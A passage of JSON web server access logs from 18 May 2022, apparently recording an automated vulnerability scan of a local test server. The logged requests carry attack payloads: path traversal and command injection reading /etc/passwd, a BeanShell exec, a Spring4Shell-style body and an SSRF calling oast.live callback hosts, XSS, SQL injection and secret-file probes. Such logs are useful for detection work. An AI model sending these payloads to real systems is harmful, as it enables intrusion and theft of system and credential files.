HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cobbler/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /UI HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/checklist/images/checklist-icon.php?&fill=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/api/2/projectCategory?maxResults=1000 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adminer?elastic=example.com&username= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellcheckder.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/database-backups/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /install/includes/configure.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%5cexample.com@ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"class.module.classLoader.resources.context.configFile=https://ca28fg0smpvbd3qg07h0ywcxa76mzuga7.oast.live&class.module.classLoader.resources.context.configFile.content.aaa=xxx\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /module/ph_simpleblog/list?sb_category=')%20OR%20true--%20- HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"{\x0D\x0A \x22user_login\x22:\x2229KD20vCHUlTNDoD8vGk4FYHZ8X\x22,\x0D\x0A \x22password\x22:\x2229KD20vCHUlTNDoD8vGk4FYHZ8X\x22,\x0D\x0A \x22user_name\x22:\x2229KD20vCHUlTNDoD8vGk4FYHZ8X\x22,\x0D\x0A \x22user_email\x22:\x2229KD20vCHUlTNDoD8vGk4FYHZ8X@example.com\x22\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-json/buddypress/v1/signup HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env_1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /myaccount/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/radius/server_ping.php?ip=127.0.0.1|cat%20/etc/passwd>../../29KD1v7b3vpXrsrzbSP7cLwSkNi.txt&id=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/30 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /query HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ovirt-engine/userportal/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cblr/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /downloads/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sso/XUI HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ueditor/php/getRemoteImage.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?v=d HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"bsh.script=exec(\x22cat+/etc/passwd\x22);&bsh.servlet.output=raw","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /bsh.servlet.BshServlet HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%23.example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /messages HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/nobody/Machine.cgi?action=get_capability HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /global-protect/login.esp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /module/ph_simpleblog/list?sb_category=')%20AND%20false--%20- HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php?page=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env_sample HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /29KD1v7b3vpXrsrzbSP7cLwSkNi.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/31 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /query-api HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ovirt-engine/webadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_zimbcomment&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth/logout?continue=//example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sso/UI HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?redirect=..%2f..%2f..%2f..%2fwindows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mod/lti/auth.php?redirect_uri=javascript:alert('29KD1x3WklFe8e0J2P0pJRRLpDi') HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ws/v1/cluster/apps/new-application HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config.php-backup HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://.example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth/realms/master/protocol/openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=http://ca28fg0smpvbd3qg07h065awjtjyneb4u.oast.live/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/install.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sslmgr HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dns-query?dns=q80BAAABAAAAAAAAA3d3dwdleGFtcGxlA2NvbQAAAQAB HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:46 